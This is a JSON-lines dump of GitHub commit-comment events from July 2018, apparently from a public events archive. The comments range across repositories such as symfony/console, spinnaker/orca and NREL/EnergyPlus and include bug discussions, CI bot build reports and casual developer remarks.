{"id":"7963543566","type":"CommitCommentEvent","actor":{"login":"crtlib"},"repo":{"name":"symfony/console"},"payload":{"comment":{"id":29703186,"position":null,"line":null,"path":null,"commit_id":"7afe26f4eca9b4fb2009c4a5b035f74ed2872807","created_at":"2018-07-13T17:58:52Z","updated_at":"2018-07-13T17:58:52Z","author_association":"NONE","body":"Wow! I don't understand clearly how it happend, but this commit broke autoloading in my yii2 app. In OutputFormatterStyleStack I have `use Symfony\\Contracts\\Service\\ResetInterface;`, but in the generated autoload file `'Symfony\\\\Contract\\\\' => array($vendorDir . '/symfony/contracts'),`. Do you have any ideas how?"}},"created_at":"2018-07-13T17:58:52Z"}
{"id":"7963544003","type":"CommitCommentEvent","actor":{"login":"mvl22"},"repo":{"name":"DoccyB/cycledata"},"payload":{"comment":{"id":29703189,"position":null,"line":null,"path":null,"commit_id":"9f2cbb3957bfb08b62eb1f4a1033a709d9519054","created_at":"2018-07-13T17:58:58Z","updated_at":"2018-07-13T17:58:58Z","author_association":"COLLABORATOR","body":"Good work!"}},"created_at":"2018-07-13T17:58:58Z"}
{"id":"7963545489","type":"CommitCommentEvent","actor":{"login":"kcbaltz"},"repo":{"name":"spinnaker/orca"},"payload":{"comment":{"id":29703192,"position":5,"line":115,"path":"orca-clouddriver/src/main/groovy/com/netflix/spinnaker/orca/clouddriver/tasks/servergroup/ServerGroupCacheForceRefreshTask.groovy","commit_id":"3607e7252a3d70636137aa0973e9427de2194ce7","created_at":"2018-07-13T17:59:18Z","updated_at":"2018-07-13T17:59:18Z","author_association":"NONE","body":"@ezimanyi   Isn't this logic backwards? If any of the forceCacheUpdates returns 200, it will act as if they all did. Unless that's the behavior your want, I think this variable should start out true and be set to false if any of them return 202 (or not 200)."}},"created_at":"2018-07-13T17:59:18Z"}
{"id":"7963551640","type":"CommitCommentEvent","actor":{"login":"LadyD1"},"repo":{"name":"LadyD1/hello-world"},"payload":{"comment":{"id":29703208,"position":null,"line":null,"path":null,"commit_id":"d726ee35e943dce4cb17ebbe945c8b5d858fb567","created_at":"2018-07-13T18:00:34Z","updated_at":"2018-07-13T18:00:34Z","author_association":"OWNER","body":"readme-edits "}},"created_at":"2018-07-13T18:00:34Z"}
{"id":"7963564022","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29703233,"position":48,"line":378,"path":"epic_bf_dev/EPIC_bifrost.py","commit_id":"6385706d6296b92a46a29a44b2cc7fd13e627b70","created_at":"2018-07-13T18:03:10Z","updated_at":"2018-07-13T18:03:10Z","author_association":"COLLABORATOR","body":"For the ci8 data you should be able to use `idata = idata[...,0] + 1j*idata[...,1]` to get it into `numpy.complex64`.  For the ci4 data in the updated version of `offline_tbn.py` you would need to unpack but you can do that straight to `numpy.complex64` but maybe there is a way to work with the data either natively as ci4 or something like ci8."}},"created_at":"2018-07-13T18:03:10Z"}
{"id":"7963572306","type":"CommitCommentEvent","actor":{"login":"TheGreat2201"},"repo":{"name":"Chinmay-Shivansh/IP_Project_Chinmay__Shivansh"},"payload":{"comment":{"id":29703255,"position":null,"line":null,"path":null,"commit_id":"117e3af08733e86a6418ac67b47aece37d39ce06","created_at":"2018-07-13T18:05:02Z","updated_at":"2018-07-13T18:05:02Z","author_association":"COLLABORATOR","body":"Set label icon through custom code to avoid errors\r\n![screenshot 107](https://user-images.githubusercontent.com/36493671/42706694-532772b6-86f5-11e8-97c0-dc2bd2aa9d00.png)\r\n![screenshot 108](https://user-images.githubusercontent.com/36493671/42706695-535a07e4-86f5-11e8-8d5d-4e2f60f86fdc.png)"}},"created_at":"2018-07-13T18:05:02Z"}
{"id":"7963576801","type":"CommitCommentEvent","actor":{"login":"adarshp"},"repo":{"name":"ml4ai/delphi"},"payload":{"comment":{"id":29703261,"position":null,"line":null,"path":null,"commit_id":"70cd902c7143522970cd155da8ec302872cbca2c","created_at":"2018-07-13T18:06:01Z","updated_at":"2018-07-13T18:06:01Z","author_association":"COLLABORATOR","body":"Which reminds me - Jupyter notebooks don't really play very well with version control. I don't know of a great solution to this - for now I'd suggest that we clear the outputs of the notebook (I think there is an option called 'Restart and clear all outputs' in the toolbar...) before committing the notebook.\r\n\r\nThis should work fine for development unless the notebooks take a huge amount of time to run. For sharing actual output, etc, I'm fine with just exporting the notebook to HTML and putting it on Google Drive, or some public-facing website using `scp` or `rsync` (I put the 6-month evaluation demo notebook in vision.cs.arizona.edu/adarsh/export/6_month_evaluation_demo.html) "}},"created_at":"2018-07-13T18:06:01Z"}
{"id":"7963578418","type":"CommitCommentEvent","actor":{"login":"TheGreat2201"},"repo":{"name":"Chinmay-Shivansh/IP_Project_Chinmay__Shivansh"},"payload":{"comment":{"id":29703271,"position":null,"line":null,"path":null,"commit_id":"562cb9718f56e0f33c87cbf2d75489c98017c579","created_at":"2018-07-13T18:06:23Z","updated_at":"2018-07-13T18:06:23Z","author_association":"COLLABORATOR","body":"I'm done.\r\nThat's all for today"}},"created_at":"2018-07-13T18:06:23Z"}
{"id":"7963581402","type":"CommitCommentEvent","actor":{"login":"TheGreat2201"},"repo":{"name":"Chinmay-Shivansh/IP_Project_Chinmay__Shivansh"},"payload":{"comment":{"id":29703277,"position":null,"line":null,"path":null,"commit_id":"562cb9718f56e0f33c87cbf2d75489c98017c579","created_at":"2018-07-13T18:07:01Z","updated_at":"2018-07-13T18:07:01Z","author_association":"COLLABORATOR","body":"I could've asked Daksh but my ego was in the way"}},"created_at":"2018-07-13T18:07:01Z"}
{"id":"7963584041","type":"CommitCommentEvent","actor":{"login":"TheGreat2201"},"repo":{"name":"Chinmay-Shivansh/IP_Project_Chinmay__Shivansh"},"payload":{"comment":{"id":29703285,"position":null,"line":null,"path":null,"commit_id":"562cb9718f56e0f33c87cbf2d75489c98017c579","created_at":"2018-07-13T18:07:34Z","updated_at":"2018-07-13T18:07:34Z","author_association":"COLLABORATOR","body":"Even then, he couldn't solve this problem."}},"created_at":"2018-07-13T18:07:34Z"}
{"id":"7963590397","type":"CommitCommentEvent","actor":{"login":"ezimanyi"},"repo":{"name":"spinnaker/orca"},"payload":{"comment":{"id":29703295,"position":5,"line":115,"path":"orca-clouddriver/src/main/groovy/com/netflix/spinnaker/orca/clouddriver/tasks/servergroup/ServerGroupCacheForceRefreshTask.groovy","commit_id":"3607e7252a3d70636137aa0973e9427de2194ce7","created_at":"2018-07-13T18:09:02Z","updated_at":"2018-07-13T18:09:02Z","author_association":"MEMBER","body":"Hmm, yes I think you're right.  It's pre-existing to my change, but I noted in the comment that I fixed that bug (https://github.com/spinnaker/orca/pull/2268#issuecomment-392154888) but it appears I didn't actually fix it.\r\n\r\nAre you running into a case where some cache updates return 202 but others return 200?  (I wasn't hitting that particular case.)"}},"created_at":"2018-07-13T18:09:02Z"}
{"id":"7963590629","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29703296,"position":null,"line":null,"path":null,"commit_id":"e94c9babac891617b828ec1a5f6f44b33dac491b","created_at":"2018-07-13T18:09:05Z","updated_at":"2018-07-13T18:09:05Z","author_association":"NONE","body":"develop (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2311 of 2311 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e94c9babac891617b828ec1a5f6f44b33dac491b-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e94c9babac891617b828ec1a5f6f44b33dac491b-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-13T18:09:05Z"}
{"id":"7963592802","type":"CommitCommentEvent","actor":{"login":"tasso94"},"repo":{"name":"camunda/camunda-bpm-webapp"},"payload":{"comment":{"id":29703300,"position":87,"line":87,"path":"src/main/java/org/camunda/bpm/webapp/impl/security/filter/CsrfPreventionFilter.java","commit_id":"d2ca518dbe53eed373a8da45f0f65cc6626bb0bd","created_at":"2018-07-13T18:09:34Z","updated_at":"2018-07-13T18:09:34Z","author_association":"MEMBER","body":"How awesome is that? 👍 "}},"created_at":"2018-07-13T18:09:34Z"}
{"id":"7963604270","type":"CommitCommentEvent","actor":{"login":"TonisOrmisson"},"repo":{"name":"2amigos/yii2-usuario"},"payload":{"comment":{"id":29703332,"position":5,"line":103,"path":"src/User/resources/views/settings/account.php","commit_id":"19eb9df623063f9afc3959dfded53c7bf59f1f4d","created_at":"2018-07-13T18:12:06Z","updated_at":"2018-07-13T18:12:06Z","author_association":"CONTRIBUTOR","body":"We could just replace the English version from \"protects you against\" to \"in case of\" and replace all the occurrences of that string in the code including the translations? I translated ET ant there I used the \"in case of\" meaning anyway. "}},"created_at":"2018-07-13T18:12:06Z"}
{"id":"7963613692","type":"CommitCommentEvent","actor":{"login":"sharanyadas"},"repo":{"name":"sharanyadas/BLE-Tester"},"payload":{"comment":{"id":29703348,"position":3,"line":2,"path":"README.md","commit_id":"1cd3f99dd60f50fa8bbc71ffba18ae437cd67e9b","created_at":"2018-07-13T18:14:09Z","updated_at":"2018-07-13T18:14:09Z","author_association":"OWNER","body":"A Python based application to test BLE devices. This will automatically discover devices and has the ability to connect to and read from any device labeled 'Petasense Mote.’ This application has a simple GUI. "}},"created_at":"2018-07-13T18:14:09Z"}
{"id":"7963614131","type":"CommitCommentEvent","actor":{"login":"crtlib"},"repo":{"name":"symfony/console"},"payload":{"comment":{"id":29703351,"position":null,"line":null,"path":null,"commit_id":"7afe26f4eca9b4fb2009c4a5b035f74ed2872807","created_at":"2018-07-13T18:14:14Z","updated_at":"2018-07-13T18:14:14Z","author_association":"NONE","body":"`- Installing symfony/contracts (dev-master e1748c5): Cloning e1748c562d from cache`\r\n`- Installing symfony/console (dev-master 7afe26f): Cloning 7afe26f4ec from cache`\r\nThere is only one commit in `symfony/contracts`! Did you do a force-push? Please shed some light how this could happen? 🤔 "}},"created_at":"2018-07-13T18:14:14Z"}
{"id":"7963617709","type":"CommitCommentEvent","actor":{"login":"crtlib"},"repo":{"name":"symfony/console"},"payload":{"comment":{"id":29703359,"position":null,"line":null,"path":null,"commit_id":"7afe26f4eca9b4fb2009c4a5b035f74ed2872807","created_at":"2018-07-13T18:15:02Z","updated_at":"2018-07-13T18:15:02Z","author_association":"NONE","body":"Yeah! Indeed, this is the commit I took and got cached `https://github.com/symfony/contracts/commit/e1748c5`"}},"created_at":"2018-07-13T18:15:02Z"}
{"id":"7963619950","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29703365,"position":null,"line":null,"path":null,"commit_id":"d38b1d3cab8282826c4f3a91979c822ec91f689e","created_at":"2018-07-13T18:15:29Z","updated_at":"2018-07-13T18:15:29Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-209](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-209).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-209-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-13T18:15:29Z"}
{"id":"7963620284","type":"CommitCommentEvent","actor":{"login":"kzdixon"},"repo":{"name":"Groupre/groupre"},"payload":{"comment":{"id":29703367,"position":null,"line":null,"path":null,"commit_id":"9e21bc1f0297ca0c76fbd0dc9889cf3bb15ba24b","created_at":"2018-07-13T18:15:34Z","updated_at":"2018-07-13T18:15:34Z","author_association":"MEMBER","body":"@kamisch Make sure to use the develop branch when developing as it is the latest version that was worked on. Also, you may want to add *.pyc to the .gitignore file, I don't recall those showing up before and thought they had been ignored previously but that may not be the case at the moment."}},"created_at":"2018-07-13T18:15:34Z"}
{"id":"7963638824","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29703412,"position":null,"line":null,"path":null,"commit_id":"c31e23de8d7f2f21bf99ec3a9b1e057501a0462f","created_at":"2018-07-13T18:19:35Z","updated_at":"2018-07-13T18:19:35Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2958 of 2975 tests passed, 13 test warnings)\n\nMessages:\n\n * 12 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: Table small diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c31e23de8d7f2f21bf99ec3a9b1e057501a0462f-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c31e23de8d7f2f21bf99ec3a9b1e057501a0462f-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.43%25-yellow.png)</a> \n"}},"created_at":"2018-07-13T18:19:35Z"}
{"id":"7963641584","type":"CommitCommentEvent","actor":{"login":"LIONSAT"},"repo":{"name":"LIONSAT/logo-png"},"payload":{"comment":{"id":29703421,"position":null,"line":null,"path":null,"commit_id":"79b8ec2ac84beb41b22f09bb32610453431af08b","created_at":"2018-07-13T18:20:11Z","updated_at":"2018-07-13T18:20:11Z","author_association":"OWNER","body":"-----"}},"created_at":"2018-07-13T18:20:11Z"}
{"id":"7963642631","type":"CommitCommentEvent","actor":{"login":"LIONSAT"},"repo":{"name":"LIONSAT/logo-png"},"payload":{"comment":{"id":29703425,"position":null,"line":null,"path":null,"commit_id":"79b8ec2ac84beb41b22f09bb32610453431af08b","created_at":"2018-07-13T18:20:24Z","updated_at":"2018-07-13T18:20:24Z","author_association":"OWNER","body":"azerty"}},"created_at":"2018-07-13T18:20:24Z"}
{"id":"7963643832","type":"CommitCommentEvent","actor":{"login":"thundersnow-automation"},"repo":{"name":"thundersnow-automation/devportal-d8"},"payload":{"comment":{"id":29703427,"position":null,"line":null,"path":null,"commit_id":"19636092b4964dc27dafc1caf4aab79a6d502fa4","created_at":"2018-07-13T18:20:40Z","updated_at":"2018-07-13T18:20:40Z","author_association":"OWNER","body":"Created multidev environment [devportal-d8#ci-1](https://dashboard.pantheon.io/sites/e3db992f-35fa-4eec-b1cd-3e71f022fbfd#ci-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1-devportal-d8.pantheonsite.io/)"}},"created_at":"2018-07-13T18:20:40Z"}
{"id":"7963645211","type":"CommitCommentEvent","actor":{"login":"MikeLund"},"repo":{"name":"frk1/hazedumper"},"payload":{"comment":{"id":29703429,"position":null,"line":null,"path":null,"commit_id":"59749e4e675adb44ae3af20f195c1107d3cf6b58","created_at":"2018-07-13T18:20:57Z","updated_at":"2018-07-13T18:20:57Z","author_association":"NONE","body":"@oaorottiw try to [dump it yourself](https://github.com/frk1/hazedumper-rs) then, smh"}},"created_at":"2018-07-13T18:20:57Z"}
{"id":"7963654367","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29703453,"position":null,"line":null,"path":null,"commit_id":"8ceed642cb0cb985edbdb8722d314c46a2d9b1b0","created_at":"2018-07-13T18:22:55Z","updated_at":"2018-07-13T18:22:55Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/setup-wizard-emoji-wrong-in-subfolder-install/91442/33\n"}},"created_at":"2018-07-13T18:22:55Z"}
{"id":"7963658015","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29703464,"position":null,"line":null,"path":null,"commit_id":"b5bf151a518c0d2d6ca0495fc3f88060cc3a32d0","created_at":"2018-07-13T18:23:45Z","updated_at":"2018-07-13T18:23:45Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-729](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-729).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-729-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-13T18:23:45Z"}
{"id":"7963683128","type":"CommitCommentEvent","actor":{"login":"ggreif"},"repo":{"name":"turion/rhine"},"payload":{"comment":{"id":29703519,"position":9,"line":39,"path":"rhine/src/FRP/Rhine/Clock/Realtime/Stdin.hs","commit_id":"416b5c1a02a72297da53bac9c64aafed13e43180","created_at":"2018-07-13T18:29:09Z","updated_at":"2018-07-13T18:29:09Z","author_association":"CONTRIBUTOR","body":"For people in the know it is easy to read, for\nbeginner-to-intermediate probably less so.\n\nOn 7/13/18, Manuel Bärenz <notifications@github.com> wrote:\n> @ggreif not sure... yours is shorter and maybe more efficient, but is it\n> easier to read?\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/turion/rhine/commit/416b5c1a02a72297da53bac9c64aafed13e43180#commitcomment-29702449\n"}},"created_at":"2018-07-13T18:29:09Z"}
{"id":"7963683151","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29703521,"position":null,"line":null,"path":null,"commit_id":"76171493fef4328d9d266790f9eee5fd95cd8c99","created_at":"2018-07-13T18:29:10Z","updated_at":"2018-07-13T18:29:10Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2311 of 2311 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-76171493fef4328d9d266790f9eee5fd95cd8c99-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-76171493fef4328d9d266790f9eee5fd95cd8c99-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-13T18:29:10Z"}
{"id":"7963685891","type":"CommitCommentEvent","actor":{"login":"matricks"},"repo":{"name":"matricks/bam"},"payload":{"comment":{"id":29703531,"position":null,"line":null,"path":null,"commit_id":"10c0f237800fbf4599eb291cdf1cd9cf1914e7be","created_at":"2018-07-13T18:29:45Z","updated_at":"2018-07-13T18:29:45Z","author_association":"OWNER","body":"How do you render does dot graphs or do you have any good viewer for them? I always find that they get waaay to unwiedly to use :/"}},"created_at":"2018-07-13T18:29:45Z"}
{"id":"7963686717","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29703534,"position":null,"line":null,"path":null,"commit_id":"5a635779ee623e718f333732e9e939a999861954","created_at":"2018-07-13T18:29:55Z","updated_at":"2018-07-13T18:29:55Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-732](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-732).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-732-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-13T18:29:55Z"}
{"id":"7963688815","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29703541,"position":null,"line":null,"path":null,"commit_id":"62017a1405906036889c6b3bf2625b701bf561fb","created_at":"2018-07-13T18:30:21Z","updated_at":"2018-07-13T18:30:21Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/83/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/83//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/62017a1405906036889c6b3bf2625b701bf561fb/83/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/62017a1405906036889c6b3bf2625b701bf561fb/83/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/62017a1405906036889c6b3bf2625b701bf561fb/83/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/62017a1405906036889c6b3bf2625b701bf561fb/83/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-13T18:30:21Z"}
{"id":"7963690204","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29703544,"position":null,"line":null,"path":null,"commit_id":"6cb125527edee91c901a4eea88ee39423eee9fd7","created_at":"2018-07-13T18:30:38Z","updated_at":"2018-07-13T18:30:38Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3857prefer](https://3857prefer-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/guides/drupal-8-composer-no-ci](https://3857prefer-static-docs.pantheonsite.io/docs/guides/drupal-8-composer-no-ci)\n"}},"created_at":"2018-07-13T18:30:38Z"}
{"id":"7963697101","type":"CommitCommentEvent","actor":{"login":"khangrepo"},"repo":{"name":"khangrepo/khangrepo.github.io"},"payload":{"comment":{"id":29703560,"position":null,"line":null,"path":null,"commit_id":"b52344bde547ff41ecfc84fba8fd2a8888a3f2f0","created_at":"2018-07-13T18:32:09Z","updated_at":"2018-07-13T18:32:09Z","author_association":"OWNER","body":"hi"}},"created_at":"2018-07-13T18:32:09Z"}
{"id":"7963700588","type":"CommitCommentEvent","actor":{"login":"susburrows"},"repo":{"name":"E3SM-Project/E3SM"},"payload":{"comment":{"id":29703568,"position":null,"line":null,"path":null,"commit_id":"37985f4efac90c6f46dd4554336bf067b706a380","created_at":"2018-07-13T18:32:56Z","updated_at":"2018-07-13T18:32:56Z","author_association":"CONTRIBUTOR","body":"Got it, thanks!"}},"created_at":"2018-07-13T18:32:56Z"}
{"id":"7963709593","type":"CommitCommentEvent","actor":{"login":"jlblancoc"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29703598,"position":51,"line":357,"path":"gui/CMainWindow.cpp","commit_id":"6931b825544acca912e0298e8c373a756cb6d37c","created_at":"2018-07-13T18:34:56Z","updated_at":"2018-07-13T18:34:56Z","author_association":"NONE","body":"After a second thought, it might be that what you need is the opposite,\nyour class to store a std::function which in turn calls to a QObject, but\nanyway the idea is similar. Let us know if you make it work.\n\nCheers\n"}},"created_at":"2018-07-13T18:34:56Z"}
{"id":"7963712174","type":"CommitCommentEvent","actor":{"login":"smithsp"},"repo":{"name":"gafusion/omas"},"payload":{"comment":{"id":29703619,"position":null,"line":null,"path":null,"commit_id":"6eb06aa2535a3ee5763bdc0e64ac6fff63863500","created_at":"2018-07-13T18:35:31Z","updated_at":"2018-07-13T18:35:31Z","author_association":"MEMBER","body":"`git bisect` points to this commit as causing\r\nhttps://travis-ci.org/gafusion/omas/jobs/403668217#L577"}},"created_at":"2018-07-13T18:35:31Z"}
{"id":"7963716285","type":"CommitCommentEvent","actor":{"login":"xinyifly"},"repo":{"name":"ronancpl/HeavenMS"},"payload":{"comment":{"id":29703654,"position":5,"line":53,"path":"scripts/npc/1032001.js","commit_id":"94425ba616dacf61b156044ac3993e2d06584c8f","created_at":"2018-07-13T18:36:26Z","updated_at":"2018-07-13T18:36:26Z","author_association":"NONE","body":"Isn't line50 saying `cm.getLevel() >= 8` ?"}},"created_at":"2018-07-13T18:36:26Z"}
{"id":"7963716676","type":"CommitCommentEvent","actor":{"login":"SalatielSauer"},"repo":{"name":"sauer-sauce/sauer-sauce.github.io"},"payload":{"comment":{"id":29703656,"position":null,"line":null,"path":null,"commit_id":"469b6e2146982ca173aee732b8b58ad22c4c7418","created_at":"2018-07-13T18:36:31Z","updated_at":"2018-07-13T18:36:31Z","author_association":"CONTRIBUTOR","body":"Special thanks to @allejo who helped me with this \"target\" thing"}},"created_at":"2018-07-13T18:36:31Z"}
{"id":"7963718179","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29703663,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-13T18:36:53Z","updated_at":"2018-07-13T18:36:53Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-13T18:36:53Z"}
{"id":"7963718300","type":"CommitCommentEvent","actor":{"login":"stathisdim"},"repo":{"name":"stathisdim/php"},"payload":{"comment":{"id":29703664,"position":21,"line":30,"path":"index.php","commit_id":"cd3b99dd93a415542a7d9e2e89ba4f5823209624","created_at":"2018-07-13T18:36:55Z","updated_at":"2018-07-13T18:36:55Z","author_association":"OWNER","body":" bmnbnmb"}},"created_at":"2018-07-13T18:36:55Z"}
{"id":"7963719836","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29703670,"position":null,"line":null,"path":null,"commit_id":"06deffc9da5195049109d4e6fdc8842d0304d2b9","created_at":"2018-07-13T18:37:15Z","updated_at":"2018-07-13T18:37:15Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/repeated-captcha-for-a-couple-patrons-on-discourse/91637/17\n"}},"created_at":"2018-07-13T18:37:15Z"}
{"id":"7963726205","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29703695,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-13T18:38:40Z","updated_at":"2018-07-13T18:38:40Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-13T18:38:40Z"}
{"id":"7963726794","type":"CommitCommentEvent","actor":{"login":"papiezak"},"repo":{"name":"sneakernets/DMXOPL"},"payload":{"comment":{"id":29703696,"position":null,"line":null,"path":null,"commit_id":"f54a1e94fdbc8da7ccf78f8dc05d4fd6eea7bb3f","created_at":"2018-07-13T18:38:47Z","updated_at":"2018-07-13T18:38:47Z","author_association":"CONTRIBUTOR","body":">Also, please let me know if you run into a MIDI with a lot of missing instruments, I'll add them.\r\n\r\nOK then - [xg mids + sth.zip](https://github.com/sneakernets/DMXOPL/files/2193792/xg.mids.%2B.sth.zip) eight missing instruments in total. \r\n\r\n\r\nAlso - new edition of my own DMXOPL mod bank. This time - all of SC-55 drumkits (needs testing), new open hi-hat (ditto, #43 ), new crystal, new telephone (may be broken), clean guitar, new finger and pick basses, choir aahs, shakuhachi. imo worth checking out\r\n "}},"created_at":"2018-07-13T18:38:47Z"}
{"id":"7963734523","type":"CommitCommentEvent","actor":{"login":"tmbb"},"repo":{"name":"elixir-lang/ex_doc"},"payload":{"comment":{"id":29703721,"position":null,"line":null,"path":null,"commit_id":"35c023174a543090407392f4593db3304c6237a6","created_at":"2018-07-13T18:40:34Z","updated_at":"2018-07-13T18:40:34Z","author_association":"CONTRIBUTOR","body":"Escape character (ironically, my original stylesheet used to render escape characters in the same color as the rest of the string, so it looks like you didn't change that part 😆):\r\n\r\n![image](https://user-images.githubusercontent.com/2668874/42708194-6ed4a360-86d4-11e8-8ffe-bc7f6b2491b8.png)\r\n\r\nFunction Names and String interpolation (can't find an example of a regex in the Phoenix docs):\r\n\r\n![image](https://user-images.githubusercontent.com/2668874/42708218-8a70d9f4-86d4-11e8-8680-0a2650ee3f3c.png)\r\n"}},"created_at":"2018-07-13T18:40:34Z"}
